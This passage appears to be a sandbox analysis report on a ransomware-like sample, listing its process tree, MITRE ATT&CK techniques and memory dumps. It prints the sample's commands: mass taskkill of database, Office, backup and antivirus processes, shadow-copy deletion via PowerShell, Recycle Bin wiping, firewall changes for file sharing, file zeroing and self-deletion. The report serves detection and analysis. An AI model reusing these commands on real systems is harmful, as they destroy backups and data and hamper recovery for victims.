  - Suspicious use of AdjustPrivilegeToken
  PID:1940
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1472
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:876
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:612
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1592
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1736
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:1956
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1588
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1496
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:968
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:1460
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1476
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1080
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:1924
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1464
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1768
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:324
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1916
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1748
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1180
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:880
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  PID:820
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:852
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2036
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1528
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:940
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1596
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1948
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:440
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ragent.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1740
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM rmngr.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:884
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM rphost.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1968
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM 1cv8.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:988
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:816
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:992
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1728
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:936
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1992
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM vmwp.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:972
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1208
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:992
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:1476
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:1968
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:1296
- C:\Windows\SysWOW64\notepad.exe
  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\-Инструкция.txt
  2⤵
  PID:852
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:2036
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:1940
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:1632
- - C:\Windows\SysWOW64\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:288
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Worker-1.exe
  2⤵
  PID:1688

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1116-132-0x0000000005285000-0x0000000005296000-memory.dmp

Filesize
68KB

Download
memory/1116-55-0x0000000001120000-0x0000000001121000-memory.dmp

Filesize
4KB

Download
memory/1116-60-0x0000000005280000-0x0000000005281000-memory.dmp

Filesize
4KB

Download
memory/1208-125-0x0000000002280000-0x0000000002ECA000-memory.dmp

Filesize
12.3MB

Download
memory/2036-130-0x000007FEFC1D1000-0x000007FEFC1D3000-memory.dmp

Filesize
8KB

Download
memory/2036-131-0x00000000041D0000-0x00000000041D1000-memory.dmp

Filesize
4KB

Download
memory/2044-81-0x00000000762D1000-0x00000000762D3000-memory.dmp

Filesize
8KB

Download